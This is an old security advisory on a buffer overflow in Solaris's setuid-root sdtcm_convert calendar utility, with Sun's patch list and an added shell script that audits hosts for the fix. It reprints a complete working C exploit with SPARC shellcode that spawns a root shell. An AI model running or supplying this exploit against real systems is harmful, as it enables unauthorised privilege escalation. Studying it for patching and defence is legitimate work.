COMMAND
sdtcm_convert
SYSTEMS AFFECTED
Solaris 2.4, 2.5, 2.5.1, 2.6 and 7 (x86 only for the last one)
PROBLEM
The following is based on a Sun Microsystems Security Bulletin.
sdtcm_convert is a setuid-root calendar data conversion utility
which converts version 3 (OpenWindows) calendar data format to
version 4 (extensible calendar data format), and vice versa. A
buffer overflow has been discovered which may be exploited to gain
root access.
The exploit follows. It is said to work on both Solaris 2.6
and 7, but the author does not provide offsets for Solaris 7.
You may wish to change the
#define ADJUST 2
value to 1 for Solaris 7.
/*============================================================================
 sdtcm_convert Overflow Exploit (for SPARC Edition)
 The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
 Written by UNYUN (unewn4th@usa.net)
 [usage]
 % gcc ex_sdtcm_convert.c (This example program)
 % a.out
 If no response, hit ctrl+c
 #
============================================================================*/
#include <stdio.h>      /* printf */
#include <string.h>     /* memset, strlen */
#include <unistd.h>     /* execl */

#define ADJUST 2
#define OFFSET1 4000
#define LENGTH1 260
#define OFFSET2 6000
#define LENGTH2 1000
#define OFFSET3 (6000+16*30)
#define NOP 0xa61cc013

char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

/* SPARC only: returns the current stack pointer through %i0, the
   register the caller reads the return value from after restore */
unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
int i;

int main(void)
{
    static char x[11000];
    memset(x, 'a', 10000);
    ret_adr = get_sp() - 6300;
    for (i = 0; i < 5000; i += 4) {
        x[i+3] = ret_adr & 0xff;
        x[i+2] = (ret_adr >> 8) & 0xff;
        x[i+1] = (ret_adr >> 16) & 0xff;
        x[i+0] = (ret_adr >> 24) & 0xff;
    }
    ret_adr = get_sp() - 10200;
    if ((ret_adr & 0xff) == 0) ret_adr += 4;
    printf("%lx\n", ret_adr);
    for (i = OFFSET1 + ADJUST; i < OFFSET1 + LENGTH1; i += 4) {
        x[i+3] = ret_adr & 0xff;
        x[i+2] = (ret_adr >> 8) & 0xff;
        x[i+1] = (ret_adr >> 16) & 0xff;
        x[i+0] = (ret_adr >> 24) & 0xff;
    }
    for (i = OFFSET2 + ADJUST; i < OFFSET2 + LENGTH2; i += 4) {
        x[i+3] = NOP & 0xff;
        x[i+2] = (NOP >> 8) & 0xff;
        x[i+1] = (NOP >> 16) & 0xff;
        x[i+0] = (NOP >> 24) & 0xff;
    }
    for (i = 0; i < strlen(exploit_code); i++)
        x[OFFSET3 + ADJUST + i] = exploit_code[i];
    x[10000] = 0;
    execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d", x, "test", (char *) 0);
    return 1;   /* only reached if execl fails */
}
SOLUTION
Sun recommends that you install the respective patches immediately
on affected systems:
CDE Version    Patch ID
___________    _________
1.3            107022-01
1.3_x86        107023-01
1.2            105566-06
1.2_x86        105567-07
1.0.2          103670-06
1.0.2_x86      103717-06
1.0.1          103671-06
1.0.1_x86      103718-06
With the patch installed, the exploit fails as follows:
s4u-26% ./sdtcm_convert_exploit
efffd0c0
Problem accessing calendar file /usr/spool/calendar/callog.test:
No such file or directory
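As an added example, not part of the Sun bulletin or of the advisory above, the POSIX shell script below audits a host for the fix in the two ways a defender would want: it parses showrev -p output for any of the patch IDs in the table above (accepting a later revision of the same patch), and it tests whether /usr/dt/bin/sdtcm_convert still carries the setuid bit. The showrev -p sample lines embedded at the end are constructed for offline use; 100001-01, 107022-03 and SUNWxxxx are placeholders, not identifiers taken from the bulletin.

```shell
#!/bin/sh
# Added audit script (not part of the Sun bulletin or the advisory above).
# Checks a Solaris host for the sdtcm_convert fix in two ways:
#   1. whether one of the CDE patch IDs from the bulletin (or a later
#      revision of it) appears in `showrev -p` output, and
#   2. whether /usr/dt/bin/sdtcm_convert is still setuid.
# The `showrev -p` samples at the bottom are constructed for offline use;
# 100001-01, 107022-03 and SUNWxxxx are placeholders.

# Patch IDs from the bulletin, in base-revision form (NNNNNN-RR).
FIX_PATCHES="107022-01 107023-01 105566-06 105567-07 103670-06 103717-06 103671-06 103718-06"

# patch_at_least INSTALLED REQUIRED
# Succeeds when both IDs share the same base number and the installed
# revision is greater than or equal to the required one.
patch_at_least() {
    case $1 in *-*) ;; *) return 1 ;; esac
    ib=${1%-*}; ir=${1#*-}
    rb=${2%-*}; rr=${2#*-}
    [ "$ib" = "$rb" ] && [ "${ir#0}" -ge "${rr#0}" ]
}

# fix_installed
# Reads `showrev -p` output on stdin; succeeds if any bulletin patch (or a
# later revision of it) is listed. On a live host:
#   showrev -p | fix_installed && echo "sdtcm_convert fix present"
fix_installed() {
    while read -r line; do
        case $line in
            Patch:\ *) ;;
            *) continue ;;
        esac
        set -- $line            # $2 is the patch ID on a "Patch: ..." line
        for req in $FIX_PATCHES; do
            if patch_at_least "$2" "$req"; then
                return 0
            fi
        done
    done
    return 1
}

# setuid_binary FILE
# Succeeds if FILE exists and carries the setuid bit (POSIX test -u).
# Until the patch is applied, `chmod u-s /usr/dt/bin/sdtcm_convert` removes
# the root privilege the overflow would otherwise inherit, at the cost of
# the tool's use by unprivileged users.
setuid_binary() {
    [ -u "$1" ]
}

# Constructed samples: an unpatched host, and the same host after a later
# revision of the CDE 1.3 patch was applied (107022-03 is a placeholder).
SAMPLE_UNPATCHED='Patch: 100001-01 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWxxxx'
SAMPLE_PATCHED="$SAMPLE_UNPATCHED
Patch: 107022-03 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWxxxx"

if printf '%s\n' "$SAMPLE_UNPATCHED" | fix_installed; then
    echo "unpatched sample: fix present (unexpected)"
else
    echo "unpatched sample: fix missing"
fi
if printf '%s\n' "$SAMPLE_PATCHED" | fix_installed; then
    echo "patched sample: fix present"
fi
if setuid_binary /usr/dt/bin/sdtcm_convert; then
    echo "/usr/dt/bin/sdtcm_convert is setuid"
fi
```

The run at the bottom only exercises the constructed lines; on a Solaris host, pipe the real showrev -p output into fix_installed. The bulletin lists no workaround other than the patches, so dropping the setuid bit is mentioned only as an interim measure: without it the overflow runs with the invoking user's privileges and yields no root shell.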